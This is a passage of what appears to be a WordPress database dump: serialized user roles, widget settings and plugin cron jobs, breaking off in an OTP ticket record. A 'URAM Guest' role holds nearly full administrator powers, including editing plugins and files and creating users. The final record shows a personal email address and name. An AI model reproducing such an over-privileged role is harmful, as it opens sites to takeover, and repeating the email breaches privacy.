s\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:31:\"read_private_aggregator-records\";b:1;s:23:\"edit_aggregator-records\";b:1;s:30:\"edit_others_aggregator-records\";b:1;s:31:\"edit_private_aggregator-records\";b:1;s:33:\"edit_published_aggregator-records\";b:1;s:25:\"delete_aggregator-records\";b:1;s:32:\"delete_others_aggregator-records\";b:1;s:33:\"delete_private_aggregator-records\";b:1;s:35:\"delete_published_aggregator-records\";b:1;s:26:\"publish_aggregator-records\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:21:\"manage_event_listings\";b:1;s:18:\"edit_event_listing\";b:1;s:18:\"read_event_listing\";b:1;s:20:\"delete_event_listing\";b:1;s:19:\"edit_event_listings\";b:1;s:26:\"edit_others_event_listings\";b:1;s:22:\"publish_event_listings\";b:1;s:27:\"read_private_event_listings\";b:1;s:21:\"delete_event_listings\";b:1;s:29:\"delete_private_event_listings\";b:1;s:31:\"delete_published_event_listings\";b:1;s:28:\"delete_others_event_listings\";b:1;s:27:\"edit_private_event_listings\";b:1;s:29:\"edit_published_event_listings\";b:1;s:26:\"manage_event_listing_terms\";b:1;s:24:\"edit_event_listing_terms\";b:1;s:26:\"delete_event_listing_terms\";b:1;s:26:\"assign_event_listing_terms\";b:1;s:6:\"nf_sub\";b:1;s:12:\"create_posts\";b:1;s:17:\"install_languages\";b:1;s:14:\"resume_plugins\";b:1;s:13:\"resume_themes\";b:1;s:23:\"view_site_health_checks\";b:1;s:12:\"mec_bookings\";b:1;s:15:\"mec_add_booking\";b:1;s:11:\"mec_coupons\";b:1;s:10:\"mec_report\";b:1;s:17:\"mec_import_export\";b:1;s:12:\"mec_settings\";b:1;s:14:\"mec_shortcodes\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:22:\"fluentform_full_access\";b:1;s:27:\"fluentform_settings_manager\";b:1;s:27:\"fluentform_dashboard_access\";b:1;s:24:\"fluentform_forms_manager\";b:1;s:25:\"fluentform_entries_viewer\";b:1;s:26:\"delete_others_tribe_events\";b:1;s:30:\"delete_others_tribe_organizers\";b:1;s:26:\"delete_others_tribe_venues\";b:1;s:27:\"delete_private_tribe_events\";b:1;s:31:\"delete_private_tribe_organizers\";b:1;s:27:\"delete_private_tribe_venues\";b:1;s:29:\"delete_published_tribe_events\";b:1;s:33:\"delete_published_tribe_organizers\";b:1;s:29:\"delete_published_tribe_venues\";b:1;s:19:\"delete_tribe_events\";b:1;s:23:\"delete_tribe_organizers\";b:1;s:19:\"delete_tribe_venues\";b:1;s:24:\"edit_others_tribe_events\";b:1;s:28:\"edit_others_tribe_organizers\";b:1;s:24:\"edit_others_tribe_venues\";b:1;s:25:\"edit_private_tribe_events\";b:1;s:29:\"edit_private_tribe_organizers\";b:1;s:25:\"edit_private_tribe_venues\";b:1;s:27:\"edit_published_tribe_events\";b:1;s:31:\"edit_published_tribe_organizers\";b:1;s:27:\"edit_published_tribe_venues\";b:1;s:17:\"edit_tribe_events\";b:1;s:21:\"edit_tribe_organizers\";b:1;s:17:\"edit_tribe_venues\";b:1;s:20:\"publish_tribe_events\";b:1;s:24:\"publish_tribe_organizers\";b:1;s:20:\"publish_tribe_venues\";b:1;s:25:\"read_private_tribe_events\";b:1;s:29:\"read_private_tribe_organizers\";b:1;s:25:\"read_private_tribe_venues\";b:1;s:10:\"copy_posts\";b:1;s:25:\"fluentform_manage_entries\";b:1;s:24:\"fluentform_view_payments\";b:1;s:26:\"fluentform_manage_payments\";b:1;s:20:\"wpcode_edit_snippets\";b:1;s:24:\"wpcode_activate_snippets\";b:1;s:15:\"manage_security\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:43:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:31:\"read_private_aggregator-records\";b:1;s:23:\"edit_aggregator-records\";b:1;s:30:\"edit_others_aggregator-records\";b:1;s:31:\"edit_private_aggregator-records\";b:1;s:33:\"edit_published_aggregator-records\";b:1;s:25:\"delete_aggregator-records\";b:1;s:32:\"delete_others_aggregator-records\";b:1;s:33:\"delete_private_aggregator-records\";b:1;s:35:\"delete_published_aggregator-records\";b:1;s:26:\"publish_aggregator-records\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:14:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:23:\"edit_aggregator-records\";b:1;s:33:\"edit_published_aggregator-records\";b:1;s:25:\"delete_aggregator-records\";b:1;s:35:\"delete_published_aggregator-records\";b:1;s:26:\"publish_aggregator-records\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:7:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:23:\"edit_aggregator-records\";b:1;s:25:\"delete_aggregator-records\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:9:\"organizer\";a:2:{s:4:\"name\";s:9:\"Organizer\";s:12:\"capabilities\";a:3:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:0;s:12:\"delete_posts\";b:0;}}s:10:\"uram_guest\";a:2:{s:4:\"name\";s:10:\"URAM Guest\";s:12:\"capabilities\";a:127:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:31:\"read_private_aggregator-records\";b:1;s:23:\"edit_aggregator-records\";b:1;s:30:\"edit_others_aggregator-records\";b:1;s:31:\"edit_private_aggregator-records\";b:1;s:33:\"edit_published_aggregator-records\";b:1;s:25:\"delete_aggregator-records\";b:1;s:32:\"delete_others_aggregator-records\";b:1;s:33:\"delete_private_aggregator-records\";b:1;s:35:\"delete_published_aggregator-records\";b:1;s:26:\"publish_aggregator-records\";b:1;s:25:\"read_private_tribe_events\";b:1;s:17:\"edit_tribe_events\";b:1;s:24:\"edit_others_tribe_events\";b:1;s:25:\"edit_private_tribe_events\";b:1;s:27:\"edit_published_tribe_events\";b:1;s:19:\"delete_tribe_events\";b:1;s:26:\"delete_others_tribe_events\";b:1;s:27:\"delete_private_tribe_events\";b:1;s:29:\"delete_published_tribe_events\";b:1;s:20:\"publish_tribe_events\";b:1;s:25:\"read_private_tribe_venues\";b:1;s:17:\"edit_tribe_venues\";b:1;s:24:\"edit_others_tribe_venues\";b:1;s:25:\"edit_private_tribe_venues\";b:1;s:27:\"edit_published_tribe_venues\";b:1;s:19:\"delete_tribe_venues\";b:1;s:26:\"delete_others_tribe_venues\";b:1;s:27:\"delete_private_tribe_venues\";b:1;s:29:\"delete_published_tribe_venues\";b:1;s:20:\"publish_tribe_venues\";b:1;s:29:\"read_private_tribe_organizers\";b:1;s:21:\"edit_tribe_organizers\";b:1;s:28:\"edit_others_tribe_organizers\";b:1;s:29:\"edit_private_tribe_organizers\";b:1;s:31:\"edit_published_tribe_organizers\";b:1;s:23:\"delete_tribe_organizers\";b:1;s:30:\"delete_others_tribe_organizers\";b:1;s:31:\"delete_private_tribe_organizers\";b:1;s:33:\"delete_published_tribe_organizers\";b:1;s:24:\"publish_tribe_organizers\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:21:\"manage_event_listings\";b:1;s:18:\"edit_event_listing\";b:1;s:18:\"read_event_listing\";b:1;s:20:\"delete_event_listing\";b:1;s:19:\"edit_event_listings\";b:1;s:26:\"edit_others_event_listings\";b:1;s:22:\"publish_event_listings\";b:1;s:27:\"read_private_event_listings\";b:1;s:21:\"delete_event_listings\";b:1;s:29:\"delete_private_event_listings\";b:1;s:31:\"delete_published_event_listings\";b:1;s:28:\"delete_others_event_listings\";b:1;s:27:\"edit_private_event_listings\";b:1;s:29:\"edit_published_event_listings\";b:1;s:26:\"manage_event_listing_terms\";b:1;s:24:\"edit_event_listing_terms\";b:1;s:26:\"delete_event_listing_terms\";b:1;s:26:\"assign_event_listing_terms\";b:1;s:6:\"nf_sub\";b:1;s:12:\"create_posts\";b:1;s:17:\"install_languages\";b:1;s:14:\"resume_plugins\";b:1;s:13:\"resume_themes\";b:1;s:23:\"view_site_health_checks\";b:1;s:20:\"wpcode_edit_snippets\";b:1;s:24:\"wpcode_activate_snippets\";b:1;}}}','yes'),(95,'fresh_site','0','yes'),(96,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(101,'sidebars_widgets','a:15:{s:19:\"wp_inactive_widgets\";a:10:{i:0;s:14:\"custom_html-10\";i:1;s:22:\"black-studio-tinymce-1\";i:2;s:10:\"archives-2\";i:3;s:6:\"meta-2\";i:4;s:8:\"search-2\";i:5;s:12:\"categories-2\";i:6;s:14:\"recent-posts-2\";i:7;s:13:\"custom_html-3\";i:8;s:13:\"custom_html-4\";i:9;s:13:\"custom_html-8\";}s:18:\"mec-single-sidebar\";a:0:{}s:17:\"boldgrid-widget-1\";a:1:{i:0;s:13:\"custom_html-6\";}s:17:\"boldgrid-widget-2\";a:1:{i:0;s:14:\"custom_html-12\";}s:17:\"boldgrid-widget-3\";a:0:{}s:8:\"header-1\";a:0:{}s:8:\"header-2\";a:0:{}s:8:\"header-3\";a:0:{}s:8:\"header-4\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"sidebar-1\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(102,'cron','a:51:{i:1700585403;a:1:{s:13:\"mec_scheduler\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700585412;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1700585505;a:1:{s:26:\"rediscache_discard_metrics\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700585580;a:1:{s:29:\"fluentform_do_scheduled_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:21:\"ff_every_five_minutes\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1700585660;a:1:{s:24:\"wp_fastest_cache_Preload\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:15:\"everyfiveminute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1700586371;a:1:{s:19:\"wpo_purge_old_cache\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:19:\"wpo_purge_old_cache\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700586636;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700586641;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700586678;a:1:{s:15:\"mec_maintenance\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700588204;a:1:{s:37:\"wpo_reset_webp_conversion_test_result\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"wpo_daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700588532;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700588953;a:1:{s:38:\"event_manager_check_for_expired_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1700590968;a:1:{s:26:\"puc_cron_check_updates-mec\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700598941;a:1:{s:16:\"tribe_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700600456;a:1:{s:26:\"pum_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700601494;a:1:{s:24:\"tribe_common_log_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700601610;a:1:{s:21:\"tribe-recurrence-cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700602932;a:4:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700603013;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700603017;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700607180;a:1:{s:42:\"fluentform_do_email_report_scheduled_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700610273;a:1:{s:41:\"puc_cron_check_updates-mec-fluent-layouts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700612276;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700613470;a:1:{s:33:\"updraftplus_clean_temporary_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700615305;a:1:{s:41:\"puc_cron_check_updates-mec-liquid-layouts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700621353;a:2:{s:33:\"event_manager_delete_old_previews\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:38:\"event_manager_clear_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700621402;a:1:{s:15:\"ao_cachechecker\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700626122;a:1:{s:9:\"xmsg_ping\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700626871;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700629882;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700664416;a:1:{s:29:\"wpo_smush_clear_backup_images\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700664603;a:1:{s:17:\"mec_syncScheduler\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700664743;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700667325;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700669067;a:1:{s:29:\"simple_history/maybe_purge_db\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700669426;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700669441;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1700673600;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"6f015586535e8a25c23e73feab094d20\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1700673600;}}}}i:1700711453;a:1:{s:20:\"put_do_weekly_action\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}i:1700729217;a:1:{s:21:\"wpo_weekly_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700785075;a:1:{s:18:\"wpseo_onpage_fetch\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700796588;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700932800;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"53f1ae9a5a39a732527e58b768b8c46e\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1700932800;}}}}i:1700946056;a:1:{s:27:\"pum_weekly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1700996077;a:1:{s:26:\"wpcode_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1701092339;a:1:{s:26:\"nf_weekly_promotion_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"nf-weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1701096378;a:1:{s:22:\"nf_marketing_feed_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"nf-weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1701096420;a:1:{s:23:\"nf_email_telemetry_push\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"nf-weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1701126000;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1702478778;a:1:{s:13:\"nf_optin_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"nf-monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2678400;}}}s:7:\"version\";i:2;}','yes'),(7389045,'OTP13966','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen 